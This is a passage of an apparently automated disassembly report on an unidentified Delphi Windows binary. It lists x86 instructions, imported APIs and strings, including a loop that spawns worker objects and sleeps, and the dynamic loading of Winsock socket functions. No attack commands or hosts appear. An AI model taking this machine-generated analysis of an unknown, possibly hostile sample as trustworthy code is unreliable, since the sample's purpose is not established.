00429374 sub eax, 04h
00429377 push eax
00429378 lea edx, dword ptr [ebp-3Ch]
0042937B mov eax, dword ptr [ebp-04h]
0042937E mov ecx, dword ptr [eax]
00429380 call dword ptr [ecx+1Ch]
00429383 mov eax, dword ptr [ebp-3Ch]
00429386 mov edx, 00000004h
0042938B pop ecx
0042938C call 004048D8h
00429391 mov edx, dword ptr [ebp-34h]
00429394 mov eax, dword ptr [ebp-04h]
00429397 mov ecx, dword ptr [eax]
00429399 call dword ptr [ecx+2Ch]
0042939C xor eax, eax
0042939E push ebp
0042939F push 004293F5h
004293A4 push dword ptr fs:[eax]
004293A7 mov dword ptr fs:[eax], esp
004293AA lea eax, dword ptr [ebp-40h]
004293AD push eax
004293AE lea edx, dword ptr [ebp-44h]
004293B1 mov eax, dword ptr [ebp-04h]
004293B4 mov ecx, dword ptr [eax]
004293B6 call dword ptr [ecx+1Ch]
004293B9 mov edx, dword ptr [ebp-44h]
004293BC mov eax, 004297B0h
004293C1 call 00404960h
004293C6 dec eax
004293C7 push eax
004293C8 lea edx, dword ptr [ebp-48h]
004293CB mov eax, dword ptr [ebp-04h]
004293CE mov ecx, dword ptr [eax]
004293D0 call dword ptr [ecx+1Ch]
004293D3 mov eax, dword ptr [ebp-48h]
004293D6 xor edx, edx
004293D8 pop ecx
004293D9 call 004048D8h
004293DE mov eax, dword ptr [ebp-40h]
004293E1 call 00422574h
004293E6 mov dword ptr [0042DA74h], eax
004293EB xor eax, eax
004293ED pop edx
004293EF pop ecx Count = 2
004293F0 mov dword ptr fs:[eax], edx
004293F3 jmp 00429406h
00429406 lea eax, dword ptr [ebp-4Ch] xrefs 004293F3
00429409 push eax
0042940A lea edx, dword ptr [ebp-50h]
0042940D mov eax, dword ptr [ebp-04h]
00429410 mov ecx, dword ptr [eax]
00429412 call dword ptr [ecx+1Ch]
00429415 mov eax, dword ptr [ebp-50h]
00429418 call 00404678h
0042941D mov ebx, eax
0042941F lea edx, dword ptr [ebp-54h]
00429422 mov eax, dword ptr [ebp-04h]
00429425 mov ecx, dword ptr [eax]
00429427 call dword ptr [ecx+1Ch]
0042942A mov edx, dword ptr [ebp-54h]
0042942D mov eax, 004297B0h
00429432 call 00404960h
00429437 sub ebx, eax
00429439 push ebx
0042943A lea edx, dword ptr [ebp-58h]
0042943D mov eax, dword ptr [ebp-04h]
00429440 mov ecx, dword ptr [eax]
00429442 call dword ptr [ecx+1Ch]
00429445 mov edx, dword ptr [ebp-58h]
00429448 mov eax, 004297B0h
0042944D call 00404960h
00429452 inc eax
00429453 push eax
00429454 lea edx, dword ptr [ebp-5Ch]
00429457 mov eax, dword ptr [ebp-04h]
0042945A mov ecx, dword ptr [eax]
0042945C call dword ptr [ecx+1Ch]
0042945F mov eax, dword ptr [ebp-5Ch]
00429462 pop edx
00429463 pop ecx
00429464 call 004048D8h
00429469 mov edx, dword ptr [ebp-4Ch]
0042946C mov eax, dword ptr [ebp-04h]
0042946F mov ecx, dword ptr [eax]
00429471 call dword ptr [ecx+2Ch]
00429474 xor eax, eax
00429476 mov dword ptr [ebp-18h], eax
00429479 lea eax, dword ptr [ebp-14h]
0042947C push eax
0042947D lea edx, dword ptr [ebp-60h]
00429480 mov eax, dword ptr [ebp-04h]
00429483 mov ecx, dword ptr [eax]
00429485 call dword ptr [ecx+1Ch]
00429488 mov eax, dword ptr [ebp-60h]
0042948B mov ecx, 00000001h
00429490 mov edx, dword ptr [ebp-18h]
00429493 call 004048D8h
00429498 jmp 004294BCh
0042949A inc dword ptr [ebp-18h] xrefs 004294C9, 004294D8, 004294E7, 004294F6, 00429505, 00429514, 00429523, 00429536, 00429549, 0042955C
0042949D lea eax, dword ptr [ebp-14h]
004294A0 push eax
004294A1 lea edx, dword ptr [ebp-64h]
004294A4 mov eax, dword ptr [ebp-04h]
004294A7 mov ecx, dword ptr [eax]
004294A9 call dword ptr [ecx+1Ch]
004294AC mov eax, dword ptr [ebp-64h]
004294AF mov ecx, 00000001h
004294B4 mov edx, dword ptr [ebp-18h]
004294B7 call 004048D8h
004294BC mov eax, dword ptr [ebp-14h] xrefs 00429498
004294BF mov edx, 004297BCh
004294C4 call 004047C4h
004294C9 je 0042949Ah
004294CB mov eax, dword ptr [ebp-14h]
004294CE mov edx, 004297C8h
004294D3 call 004047C4h
004294D8 je 0042949Ah
004294DA mov eax, dword ptr [ebp-14h]
004294DD mov edx, 004297D4h
004294E2 call 004047C4h
004294E7 je 0042949Ah
004294E9 mov eax, dword ptr [ebp-14h]
004294EC mov edx, 004297E0h
004294F1 call 004047C4h
004294F6 je 0042949Ah
004294F8 mov eax, dword ptr [ebp-14h]
004294FB mov edx, 004297ECh
00429500 call 004047C4h
00429505 je 0042949Ah
00429507 mov eax, dword ptr [ebp-14h]
0042950A mov edx, 004297F8h
0042950F call 004047C4h
00429514 je 0042949Ah
00429516 mov eax, dword ptr [ebp-14h]
00429519 mov edx, 00429804h
0042951E call 004047C4h
00429523 je 0042949Ah
00429529 mov eax, dword ptr [ebp-14h]
0042952C mov edx, 00429810h
00429531 call 004047C4h
00429536 je 0042949Ah
0042953C mov eax, dword ptr [ebp-14h]
0042953F mov edx, 0042981Ch
00429544 call 004047C4h
00429549 je 0042949Ah
0042954F mov eax, dword ptr [ebp-14h]
00429552 mov edx, 00429828h
00429557 call 004047C4h
0042955C je 0042949Ah
00429562 dec dword ptr [ebp-18h]
00429565 xor eax, eax
00429567 push ebp
00429568 push 004295A4h
0042956D push dword ptr fs:[eax]
00429570 mov dword ptr fs:[eax], esp
00429573 lea eax, dword ptr [ebp-68h]
00429576 push eax
00429577 lea edx, dword ptr [ebp-6Ch]
0042957A mov eax, dword ptr [ebp-04h]
0042957D mov ecx, dword ptr [eax]
0042957F call dword ptr [ecx+1Ch]
00429582 mov eax, dword ptr [ebp-6Ch]
00429585 mov ecx, dword ptr [ebp-18h]
00429588 xor edx, edx
0042958A call 004048D8h
0042958F mov eax, dword ptr [ebp-68h]
00429592 call 00422574h
00429597 mov dword ptr [ebp-08h], eax
0042959A xor eax, eax
0042959C pop edx
0042959E pop ecx Count = 2
0042959F mov dword ptr fs:[eax], edx
004295A2 jmp 004295B4h
004295B4 lea eax, dword ptr [ebp-10h] xrefs 004295A2
004295B7 push eax
004295B8 lea edx, dword ptr [ebp-70h]
004295BB mov eax, dword ptr [ebp-04h]
004295BE mov ecx, dword ptr [eax]
004295C0 call dword ptr [ecx+1Ch]
004295C3 mov eax, dword ptr [ebp-70h]
004295C6 call 00404678h
004295CB sub eax, dword ptr [ebp-18h]
004295CE sub eax, 02h
004295D1 push eax
004295D2 lea edx, dword ptr [ebp-74h]
004295D5 mov eax, dword ptr [ebp-04h]
004295D8 mov ecx, dword ptr [eax]
004295DA call dword ptr [ecx+1Ch]
004295DD mov eax, dword ptr [ebp-74h]
004295E0 mov edx, dword ptr [ebp-18h]
004295E3 inc edx
004295E4 pop ecx
004295E5 call 004048D8h
004295EA xor eax, eax
004295EC push ebp
004295ED push 0042970Eh
004295F2 push dword ptr fs:[eax]
004295F5 mov dword ptr fs:[eax], esp
004295F8 cmp dword ptr [ebp-10h], 00000000h
004295FC je 004296FAh
00429602 cmp dword ptr [0042DA74h], 00000000h
00429609 jng 004296FAh
0042960F cmp dword ptr [0042DA68h], 00000000h
00429616 jne 004296FAh
0042961C mov edx, dword ptr [ebp-10h]
0042961F mov eax, dword ptr [0042DA80h] 00962138
00429624 mov ecx, dword ptr [eax]
00429626 call dword ptr [ecx+2Ch]
00429629 mov eax, dword ptr [0042DA80h] 00962138
0042962E mov edx, dword ptr [eax]
00429630 call dword ptr [edx+14h]
00429633 mov dword ptr [0042DA70h], eax
00429638 mov eax, dword ptr [0042DA80h] 00962138
0042963D mov edx, dword ptr [eax]
0042963F call dword ptr [edx+14h]
00429642 test eax, eax
00429644 jng 004296EEh
0042964A xor eax, eax
0042964C mov dword ptr [0042DA68h], eax
00429651 mov dword ptr [0042DA78h], 00000001h
0042965B xor eax, eax
0042965D mov dword ptr [0042DA7Ch], eax
00429662 mov eax, dword ptr [0042DA6Ch] 00000000
00429667 cmp eax, dword ptr [0042DA74h] 00000000
0042966D jnl 00429704h
00429673 xor eax, eax xrefs 004296EA
00429675 push ebp
00429676 push 004296C9h
0042967B push dword ptr fs:[eax]
0042967E mov dword ptr fs:[eax], esp
00429681 cmp dword ptr [0042DA7Ch], 01h
00429688 jne 0042969Ah
0042968A push 00000001h xrefs 00429698
0042968C call 00421B84h
00429691 cmp dword ptr [0042DA7Ch], 01h
00429698 je 0042968Ah
0042969A mov dword ptr [0042DA7Ch], 00000001h xrefs 00429688
004296A4 xor ecx, ecx
004296A6 mov dl, 01h
004296A8 mov eax, dword ptr [00421B0Ch] 00421B58
004296AD call 00413184h
004296B2 mov edx, dword ptr [0042DA6Ch] 00000000
004296B8 mov dword ptr [0042CAC8h+edx*4], eax
004296BF xor eax, eax
004296C1 pop edx
004296C3 pop ecx Count = 2
004296C4 mov dword ptr fs:[eax], edx
004296C7 jmp 004296D9h
004296D9 inc dword ptr [0042DA6Ch] xrefs 004296C7
004296DF mov eax, dword ptr [0042DA6Ch] 00000000
004296E4 cmp eax, dword ptr [0042DA74h] 00000000
004296EA jl 00429673h
004296EC jmp 00429704h
004296EE mov dword ptr [0042DA68h], 00000001h xrefs 00429644
004296F8 jmp 00429704h
004296FA mov dword ptr [0042DA68h], 00000001h xrefs 004295FC, 00429609, 00429616
00429704 xor eax, eax xrefs 004296F8, 0042966D, 004296EC
00429706 pop edx
00429708 pop ecx Count = 2
00429709 mov dword ptr fs:[eax], edx
0042970C jmp 00429734h
00429724 mov dword ptr [0042DA68h], 00000001h xrefs 004292B0
0042972E mov eax, dword ptr [ebp-0Ch]
00429731 mov dword ptr [ebp-08h], eax
00429734 mov dl, 01h xrefs 0042970C, 00429722
00429736 mov eax, dword ptr [ebp-04h]
00429739 mov ecx, dword ptr [eax]
0042973B call dword ptr [ecx-04h]
0042973E xor eax, eax
00429740 pop edx
00429742 pop ecx Count = 2
00429743 mov dword ptr fs:[eax], edx
00429746 jmp 00429752h
00429752 imul eax, dword ptr [ebp-08h], 000003E7h xrefs 00429746
00429759 push eax
0042975A call 00421B84h Sleep@KERNEL32.DLL (Hidden Import)
0042975F jmp 00429260h
APIs
    • GetModuleHandleA.KERNEL32, ref: 00405381
    • GetProcAddress.KERNEL32, ref: 00405392
    • lstrcpyn.KERNEL32, ref: 00405426
    • FindFirstFileA.KERNEL32, ref: 0040546E
    • FindClose.KERNEL32, ref: 0040547B
    • lstrlen.KERNEL32, ref: 00405487
  • GetModuleFileNameA.KERNEL32, ref: 00405538
  • GetThreadLocale.KERNEL32, ref: 00405645
  • GetLocaleInfoA.KERNEL32, ref: 0040564B
  • LoadLibraryExA.KERNEL32, ref: 00405705
Strings
  • Software\Borland\Locales, va: 0040574C
  • Software\Borland\Delphi\Locales, va: 00405768
Address Instruction Meta Information
0040551C push ebp xrefs 00405307
0040551D mov ebp, esp
0040551F add esp, FFFFFEE0h
00405525 push ebx
00405526 push esi
00405527 mov dword ptr [ebp-04h], eax
0040552A push 00000105h
0040552F lea eax, dword ptr [ebp-0000011Dh]
00405535 push eax
00405536 push 00000000h
00405538 call 00401258h GetModuleFileNameA@KERNEL32.DLL (Hidden Import)
0040553D mov byte ptr [ebp-12h], 00000000h
00405541 lea eax, dword ptr [ebp-08h]
00405544 push eax
00405545 push 000F0019h
0040554A push 00000000h
0040554C push 0040574Ch ASCII "Software\Borland\Locales"
00405551 push 80000001h
00405556 call 004012B0h
0040555B test eax, eax
0040555D je 0040559Fh
0040555F lea eax, dword ptr [ebp-08h]
00405562 push eax
00405563 push 000F0019h
00405568 push 00000000h
0040556A push 0040574Ch ASCII "Software\Borland\Locales"
0040556F push 80000002h
00405574 call 004012B0h
00405579 test eax, eax
0040557B je 0040559Fh
0040557D lea eax, dword ptr [ebp-08h]
00405580 push eax
00405581 push 000F0019h
00405586 push 00000000h
00405588 push 00405768h ASCII "Software\Borland\Delphi\Locales"
0040558D push 80000001h
00405592 call 004012B0h
00405597 test eax, eax
00405599 jne 00405628h
0040559F xor eax, eax xrefs 0040555D, 0040557B
004055A1 push ebp
004055A2 push 00405621h
004055A7 push dword ptr fs:[eax]
004055AA mov dword ptr fs:[eax], esp
004055AD mov dword ptr [ebp-18h], 00000005h
004055B4 lea eax, dword ptr [ebp-0000011Dh]
004055BA mov edx, 00000105h
004055BF call 00405364h
004055C4 lea eax, dword ptr [ebp-18h]
004055C7 push eax
004055C8 lea eax, dword ptr [ebp-12h]
004055CB push eax
004055CE push 00000000h Count = 2
004055D0 lea eax, dword ptr [ebp-0000011Dh]
004055D6 push eax
004055D7 mov eax, dword ptr [ebp-08h]
004055DA push eax
004055DB call 004012B8h
004055E0 test eax, eax
004055E2 je 00405606h
004055E4 lea eax, dword ptr [ebp-18h]
004055E7 push eax
004055E8 lea eax, dword ptr [ebp-12h]
004055EB push eax
004055EE push 00000000h Count = 2
004055F0 push 00405788h
004055F5 mov eax, dword ptr [ebp-08h]
004055F8 push eax
004055F9 call 004012B8h
004055FE test eax, eax
00405600 je 00405606h
00405602 mov byte ptr [ebp-12h], 00000000h
00405606 mov byte ptr [ebp-0Eh], 00000000h xrefs 004055E2, 00405600
0040560A xor eax, eax
0040560C pop edx
0040560E pop ecx Count = 2
0040560F mov dword ptr fs:[eax], edx
00405612 push 00405628h
00405617 mov eax, dword ptr [ebp-08h] xrefs 00405626
0040561A push eax
0040561B call 004012A8h
00405620 ret function end
00405628 push 00000105h xrefs 00405599
0040562D mov eax, dword ptr [ebp-04h]
00405630 push eax
00405631 lea eax, dword ptr [ebp-0000011Dh]
00405637 push eax
00405638 call 00401290h
0040563D push 00000005h
0040563F lea eax, dword ptr [ebp-0Dh]
00405642 push eax
00405643 push 00000003h
00405645 call 00401278h GetThreadLocale@KERNEL32.DLL (Hidden Import)
0040564A push eax
0040564B call 00401250h GetLocaleInfoA@KERNEL32.DLL (Hidden Import)
00405650 xor esi, esi
00405652 cmp byte ptr [ebp-0000011Dh], 00000000h
00405659 je 00405742h
0040565F cmp byte ptr [ebp-0Dh], 00000000h
00405663 jne 0040566Fh
00405665 cmp byte ptr [ebp-12h], 00000000h
00405669 je 00405742h
0040566F lea eax, dword ptr [ebp-0000011Dh] xrefs 00405663
00405675 push eax
00405676 call 00401298h
0040567B mov ebx, eax
0040567D lea eax, dword ptr [ebp-0000011Dh]
00405683 add ebx, eax
00405685 jmp 00405688h
00405687 dec ebx xrefs 00405695
00405688 cmp byte ptr [ebx], 0000002Eh xrefs 00405685
0040568B je 00405697h
0040568D lea eax, dword ptr [ebp-0000011Dh]
00405693 cmp ebx, eax
00405695 jne 00405687h
00405697 lea eax, dword ptr [ebp-0000011Dh] xrefs 0040568B
0040569D cmp ebx, eax
0040569F je 00405742h
004056A5 inc ebx
004056A6 cmp byte ptr [ebp-12h], 00000000h
004056AA je 004056D4h
004056AC mov edx, ebx
004056AE sub edx, eax
004056B0 mov eax, 00000105h
004056B5 sub eax, edx
004056B7 push eax
004056B8 lea eax, dword ptr [ebp-12h]
004056BB push eax
004056BC push ebx
004056BD call 00401290h
004056C2 push 00000002h
004056C4 push 00000000h
004056C6 lea eax, dword ptr [ebp-0000011Dh]
004056CC push eax
004056CD call 00401280h
004056D2 mov esi, eax
004056D4 test esi, esi xrefs 004056AA
004056D6 jne 00405742h
004056D8 cmp byte ptr [ebp-0Dh], 00000000h
004056DC je 00405742h
004056DE lea eax, dword ptr [ebp-0000011Dh]
004056E4 mov edx, ebx
004056E6 sub edx, eax
004056E8 mov eax, 00000105h
004056ED sub eax, edx
004056EF push eax
004056F0 lea eax, dword ptr [ebp-0Dh]
004056F3 push eax
004056F4 push ebx
004056F5 call 00401290h
004056FA push 00000002h
004056FC push 00000000h
004056FE lea eax, dword ptr [ebp-0000011Dh]
00405704 push eax
00405705 call 00401280h LoadLibraryExA@KERNEL32.DLL (Hidden Import)
0040570A mov esi, eax
0040570C test esi, esi
0040570E jne 00405742h
00405710 mov byte ptr [ebp-0Bh], 00000000h
00405714 lea eax, dword ptr [ebp-0000011Dh]
0040571A mov edx, ebx
0040571C sub edx, eax
0040571E mov eax, 00000105h
00405723 sub eax, edx
00405725 push eax
00405726 lea eax, dword ptr [ebp-0Dh]
00405729 push eax
0040572A push ebx
0040572B call 00401290h
00405730 push 00000002h
00405732 push 00000000h
00405734 lea eax, dword ptr [ebp-0000011Dh]
0040573A push eax
0040573B call 00401280h
00405740 mov esi, eax
00405742 mov eax, esi xrefs 00405659, 0040569F, 004056D6, 004056DC, 0040570E, 00405669
00405744 pop esi
00405745 pop ebx
00405746 mov esp, ebp
00405748 pop ebp
00405749 ret function end
APIs
  • CreateFileA.KERNEL32, ref: 0040312F
Address Instruction Meta Information
00403094 push ebx xrefs 0040318A, 00403195
00403095 push esi
00403096 push edi
00403097 mov esi, edx
00403099 mov edi, ecx
0040309B xor edx, edx
0040309D mov ebx, eax
0040309F mov dx, word ptr [eax+04h]
004030A3 sub edx, 0000D7B0h
004030A9 je 004030C0h
004030AB cmp edx, 03h
004030AE ja 00403156h
004030B4 call dword ptr [ebx+24h]
004030B7 test eax, eax
004030B9 je 004030C0h
004030BB call 00402810h
004030C0 mov word ptr [ebx+04h], D7B3h xrefs 004030A9, 004030B9
004030C6 mov dword ptr [ebx+08h], esi
004030C9 mov dword ptr [ebx+24h], 0040306Ch
004030D0 mov dword ptr [ebx+1Ch], 00402AC0h
004030D7 cmp byte ptr [ebx+48h], 00000000h
004030DB je 0040313Dh
004030DD mov eax, C0000000h
004030E2 mov dl, byte ptr [0042B00Ch] 02
004030E8 and edx, 70h
004030EB shr edx, 02h
004030EE mov edx, dword ptr [edx+0042B06Ch]
004030F4 mov ecx, 00000002h
004030F9 sub edi, 03h
004030FC je 0040311Fh
004030FE mov ecx, 00000003h
00403103 inc edi
00403104 je 0040311Fh
00403106 mov eax, 40000000h
0040310B inc edi
0040310C mov word ptr [ebx+04h], D7B2h
00403112 je 0040311Fh
00403114 mov eax, 80000000h
00403119 mov word ptr [ebx+04h], D7B1h
0040311F push 00000000h xrefs 004030FC, 00403104, 00403112
00403121 push 00000080h
00403126 push ecx
00403127 push 00000000h
00403129 push edx
0040312A push eax
0040312B lea eax, dword ptr [ebx+48h]
0040312E push eax
0040312F call 004011A8h CreateFileA@KERNEL32.DLL (Hidden Import)
00403134 cmp eax, FFFFFFFFh xrefs 00403154
00403137 je 0040315Dh
00403139 mov dword ptr [ebx], eax
0040313B jmp 0040316Dh
0040313D mov dword ptr [ebx+24h], 00402AC0h xrefs 004030DB
00403144 cmp edi, 03h
00403147 je 0040314Dh
00403149 push FFFFFFF6h
0040314B jmp 0040314Fh
0040314D push FFFFFFF5h xrefs 00403147
0040314F call 004011C0h xrefs 0040314B
00403154 jmp 00403134h
00403156 mov eax, 00000066h xrefs 004030AE
0040315B jmp 00403168h
0040315D mov word ptr [ebx+04h], D7B0h xrefs 00403137
00403163 call 00401248h
00403168 call 00402810h xrefs 0040315B
0040316D pop edi xrefs 0040313B
0040316E pop esi
0040316F pop ebx
00403170 ret function end
Address Instruction Meta Information
004016B4 push ebx xrefs 004017F5, 0040193E
004016B5 push esi
004016B6 push edi
004016B7 push ebp
004016B8 add esp, FFFFFFF4h
004016BB mov dword ptr [esp+04h], ecx
004016BF mov dword ptr [esp], edx
004016C2 mov edx, eax
004016C4 mov ebp, edx
004016C6 and ebp, FFFFF000h
004016CC add edx, dword ptr [esp]
004016CF add edx, 00000FFFh
004016D5 and edx, FFFFF000h
004016DB mov dword ptr [esp+08h], edx
004016DF mov eax, dword ptr [esp+04h]
004016E3 mov dword ptr [eax], ebp
004016E5 mov eax, dword ptr [esp+08h]
004016E9 sub eax, ebp
004016EB mov edx, dword ptr [esp+04h]
004016EF mov dword ptr [edx+04h], eax
004016F2 mov esi, dword ptr [0042C5E4h] 001491FC
004016F8 jmp 00401736h
004016FA mov ebx, dword ptr [esi+08h] xrefs 0040173C
004016FD mov edi, dword ptr [esi+0Ch]
00401700 add edi, ebx
00401702 cmp ebp, ebx
00401704 jbe 00401708h
00401706 mov ebx, ebp
00401708 cmp edi, dword ptr [esp+08h] xrefs 00401704
0040170C jbe 00401712h
0040170E mov edi, dword ptr [esp+08h]
00401712 cmp edi, ebx xrefs 0040170C
00401714 jbe 00401734h
00401716 push 00000004h
00401718 push 00001000h
0040171D sub edi, ebx
0040171F push edi
00401720 push ebx
00401721 call 0040134Ch
00401726 test eax, eax
00401728 jne 00401734h
0040172A mov eax, dword ptr [esp+04h]
0040172E xor edx, edx
00401730 mov dword ptr [eax], edx
00401732 jmp 0040173Eh
00401734 mov esi, dword ptr [esi] xrefs 00401714, 00401728
00401736 cmp esi, 0042C5E4h xrefs 004016F8
0040173C jne 004016FAh
0040173E add esp, 0Ch xrefs 00401732
00401741 pop ebp
00401742 pop edi
00401743 pop esi
00401744 pop ebx
00401745 ret function end
APIs
  • LoadLibraryA.KERNEL32, ref: 004146EF
Strings
  • WSAIoctl, va: 00414AC8
  • __WSAFDIsSet, va: 00414AD4
  • closesocket, va: 00414AE4
  • ioctlsocket, va: 00414AF0
  • WSAGetLastError, va: 00414AFC
  • WSAStartup, va: 00414B0C
  • WSACleanup, va: 00414B18
  • accept, va: 00414B24
  • bind, va: 00414B2C
  • connect, va: 00414B34
  • getpeername, va: 00414B3C
  • getsockname, va: 00414B48
  • getsockopt, va: 00414B54
  • htonl, va: 00414B60
  • htons, va: 00414B68
  • inet_addr, va: 00414B70
  • inet_ntoa, va: 00414B7C
  • listen, va: 00414B88
  • ntohl, va: 00414B90
  • ntohs, va: 00414B98
  • recv, va: 00414BA0
  • recvfrom, va: 00414BA8
  • select, va: 00414BB4
  • send, va: 00414BBC
  • sendto, va: 00414BC4
  • setsockopt, va: 00414BCC
  • shutdown, va: 00414BD8
  • socket, va: 00414BE4
  • gethostbyaddr, va: 00414BEC
  • gethostbyname, va: 00414BFC
  • getprotobyname, va: 00414C0C
  • getprotobynumber, va: 00414C1C
  • getservbyname, va: 00414C30
  • getservbyport, va: 00414C40
  • gethostname, va: 00414C50
  • getaddrinfo, va: 00414C5C
  • freeaddrinfo, va: 00414C68
  • getnameinfo, va: 00414C78
  • wship6.dll, va: 00414C84
  • ws2_32.dll, va: 00414ABC
Address Instruction Meta Information
00414670 push ebp
00414671 mov ebp, esp
00414673 add esp, FFFFFFF8h
00414676 push ebx
00414677 mov dword ptr [ebp-04h], eax
0041467A mov eax, dword ptr [ebp-04h]
0041467D call 00404868h
00414682 mov ebx, 0042B464h
00414687 xor eax, eax
00414689 push ebp
0041468A push 00414AA2h
0041468F push dword ptr fs:[eax]
00414692 mov dword ptr fs:[eax], esp
00414695 mov byte ptr [ebp-05h], 00000000h
00414699 mov byte ptr [0042C8A8h], 00000000h
004146A0 cmp dword ptr [ebp-04h], 00000000h
004146A4 jne 004146B3h
004146A6 lea eax, dword ptr [ebp-04h]
004146A9 mov edx, 00414ABCh ASCII "ws2_32.dll"
004146AE call 00404474h
004146B3 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 004146A4
004146B8 call 00413914h
004146BD xor eax, eax
004146BF push ebp
004146C0 push 00414A85h
004146C5 push dword ptr fs:[eax]
004146C8 mov dword ptr fs:[eax], esp
004146CB cmp dword ptr [0042B460h], 00000000h
004146D2 jne 00414A5Dh
004146D8 mov byte ptr [0042C8A8h], 00000000h
004146DF mov byte ptr [0042C8A9h], 00000000h
004146E6 mov eax, dword ptr [ebp-04h]
004146E9 call 00404878h
004146EE push eax
004146EF call 00406244h LoadLibraryA@KERNEL32.DLL (Import)
004146F4 mov dword ptr [ebx], eax
004146F6 cmp dword ptr [ebx], 00000000h
004146F9 je 00414A61h
004146FF push 00414AC8h ASCII "WSAIoctl"
00414704 mov eax, dword ptr [ebx]
00414706 push eax
00414707 call 004061D4h
0041470C mov dword ptr [0042B45Ch], eax
00414711 push 00414AD4h ASCII "__WSAFDIsSet"
00414716 mov eax, dword ptr [ebx]
00414718 push eax
00414719 call 004061D4h
0041471E mov dword ptr [0042B458h], eax
00414723 push 00414AE4h ASCII "closesocket"
00414728 mov eax, dword ptr [ebx]
0041472A push eax
0041472B call 004061D4h
00414730 mov dword ptr [0042B438h], eax
00414735 push 00414AF0h ASCII "ioctlsocket"
0041473A mov eax, dword ptr [ebx]
0041473C push eax
0041473D call 004061D4h
00414742 mov dword ptr [0042B418h], eax
00414747 push 00414AFCh ASCII "WSAGetLastError"
0041474C mov eax, dword ptr [ebx]
0041474E push eax
0041474F call 004061D4h
00414754 mov dword ptr [0042B3D0h], eax
00414759 push 00414B0Ch ASCII "WSAStartup"
0041475E mov eax, dword ptr [ebx]
00414760 push eax
00414761 call 004061D4h
00414766 mov dword ptr [0042B3C8h], eax
0041476B push 00414B18h ASCII "WSACleanup"
00414770 mov eax, dword ptr [ebx]
00414772 push eax
00414773 call 004061D4h
00414778 mov dword ptr [0042B3CCh], eax
0041477D push 00414B24h ASCII "accept"
00414782 mov eax, dword ptr [ebx]
00414784 push eax
00414785 call 004061D4h
0041478A mov dword ptr [0042B440h], eax
0041478F push 00414B2Ch ASCII "bind"
00414794 mov eax, dword ptr [ebx]
00414796 push eax
00414797 call 004061D4h
0041479C mov dword ptr [0042B43Ch], eax
004147A1 push 00414B34h ASCII "connect"
004147A6 mov eax, dword ptr [ebx]
004147A8 push eax
004147A9 call 004061D4h
004147AE mov dword ptr [0042B434h], eax
004147B3 push 00414B3Ch ASCII "getpeername"
004147B8 mov eax, dword ptr [ebx]
004147BA push eax
004147BB call 004061D4h
004147C0 mov dword ptr [0042B430h], eax
004147C5 push 00414B48h ASCII "getsockname"
004147CA mov eax, dword ptr [ebx]
004147CC push eax
004147CD call 004061D4h
004147D2 mov dword ptr [0042B42Ch], eax
004147D7 push 00414B54h ASCII "getsockopt"
004147DC mov eax, dword ptr [ebx]
004147DE push eax
004147DF call 004061D4h
004147E4 mov dword ptr [0042B3F8h], eax
004147E9 push 00414B60h ASCII "htonl"
004147EE mov eax, dword ptr [ebx]
004147F0 push eax
004147F1 call 004061D4h
004147F6 mov dword ptr [0042B428h], eax
004147FB push 00414B68h ASCII "htons"
00414800 mov eax, dword ptr [ebx]
00414802 push eax
00414803 call 004061D4h
00414808 mov dword ptr [0042B424h], eax
0041480D push 00414B70h ASCII "inet_addr"
00414812 mov eax, dword ptr [ebx]
00414814 push eax
00414815 call 004061D4h
0041481A mov dword ptr [0042B420h], eax
0041481F push 00414B7Ch ASCII "inet_ntoa"
00414824 mov eax, dword ptr [ebx]
00414826 push eax
00414827 call 004061D4h
0041482C mov dword ptr [0042B41Ch], eax
00414831 push 00414B88h ASCII "listen"
00414836 mov eax, dword ptr [ebx]
00414838 push eax
00414839 call 004061D4h
0041483E mov dword ptr [0042B414h], eax
00414843 push 00414B90h ASCII "ntohl"
00414848 mov eax, dword ptr [ebx]
0041484A push eax
0041484B call 004061D4h
00414850 mov dword ptr [0042B410h], eax
00414855 push 00414B98h ASCII "ntohs"
0041485A mov eax, dword ptr [ebx]
0041485C push eax
0041485D call 004061D4h
00414862 mov dword ptr [0042B40Ch], eax
00414867 push 00414BA0h ASCII "recv"
0041486C mov eax, dword ptr [ebx]
0041486E push eax
0041486F call 004061D4h
00414874 mov dword ptr [0042B404h], eax
00414879 push 00414BA8h ASCII "recvfrom"
0041487E mov eax, dword ptr [ebx]
00414880 push eax
00414881 call 004061D4h
00414886 mov dword ptr [0042B408h], eax
0041488B push 00414BB4h ASCII "select"
00414890 mov eax, dword ptr [ebx]
00414892 push eax
00414893 call 004061D4h
00414898 mov dword ptr [0042B448h], eax
0041489D push 00414BBCh ASCII "send"
004148A2 mov eax, dword ptr [ebx]
004148A4 push eax
004148A5 call 004061D4h
004148AA mov dword ptr [0042B400h], eax
004148AF push 00414BC4h ASCII "sendto"
004148B4 mov eax, dword ptr [ebx]
004148B6 push eax
004148B7 call 004061D4h
004148BC mov dword ptr [0042B3FCh], eax
004148C1 push 00414BCCh ASCII "setsockopt"
004148C6 mov eax, dword ptr [ebx]
004148C8 push eax
004148C9 call 004061D4h
004148CE mov dword ptr [0042B3F4h], eax
004148D3 push 00414BD8h ASCII "shutdown"
004148D8 mov eax, dword ptr [ebx]
004148DA push eax
004148DB call 004061D4h
004148E0 mov dword ptr [0042B3F0h], eax
004148E5 push 00414BE4h ASCII "socket"
004148EA mov eax, dword ptr [ebx]
004148EC push eax
004148ED call 004061D4h
004148F2 mov dword ptr [0042B444h], eax
004148F7 push 00414BECh ASCII "gethostbyaddr"
004148FC mov eax, dword ptr [ebx]
004148FE push eax
004148FF call 004061D4h
00414904 mov dword ptr [0042B3E8h], eax
00414909 push 00414BFCh ASCII "gethostbyname"
0041490E mov eax, dword ptr [ebx]
00414910 push eax
00414911 call 004061D4h
00414916 mov dword ptr [0042B3E4h], eax
0041491B push 00414C0Ch ASCII "getprotobyname"
00414920 mov eax, dword ptr [ebx]
00414922 push eax
00414923 call 004061D4h
00414928 mov dword ptr [0042B3DCh], eax
0041492D push 00414C1Ch ASCII "getprotobynumber"
00414932 mov eax, dword ptr [ebx]
00414934 push eax
00414935 call 004061D4h
0041493A mov dword ptr [0042B3E0h], eax
0041493F push 00414C30h ASCII "getservbyname"
00414944 mov eax, dword ptr [ebx]
00414946 push eax
00414947 call 004061D4h
0041494C mov dword ptr [0042B3D4h], eax
00414951 push 00414C40h ASCII "getservbyport"
00414956 mov eax, dword ptr [ebx]
00414958 push eax
00414959 call 004061D4h
0041495E mov dword ptr [0042B3D8h], eax
00414963 push 00414C50h ASCII "gethostname"
00414968 mov eax, dword ptr [ebx]
0041496A push eax
0041496B call 004061D4h
00414970 mov dword ptr [0042B3ECh], eax
